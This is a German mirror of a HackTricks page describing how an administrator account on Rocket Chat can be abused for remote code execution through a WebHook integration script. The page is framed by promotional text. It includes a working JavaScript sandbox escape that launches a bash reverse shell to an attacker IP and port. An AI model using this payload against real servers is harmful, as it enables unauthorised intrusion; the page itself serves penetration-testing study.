mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-24 12:03:37 +00:00
4 KiB
4 KiB
Rocket Chat
Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositories senden.
RCE
Wenn Sie als Administrator in Rocket Chat angemeldet sind, können Sie RCE erhalten.
- Gehen Sie zu
Integrations
und wählen SieNew Integration
und wählen Sie eine beliebige:Incoming WebHook
oderOutgoing WebHook
. /admin/integrations/incoming
- Laut der Dokumentation verwenden beide ES2015 / ECMAScript 6 (im Grunde JavaScript), um die Daten zu verarbeiten. Also lassen Sie uns eine rev shell für JavaScript wie:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Konfigurieren Sie den WebHook (der Kanal und der Benutzername müssen vorhanden sein):
- Konfigurieren Sie das WebHook-Skript:
- Speichern Sie die Änderungen
- Holen Sie sich die generierte WebHook-URL:
- Rufen Sie es mit curl auf und Sie sollten die Reverse-Shell erhalten
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.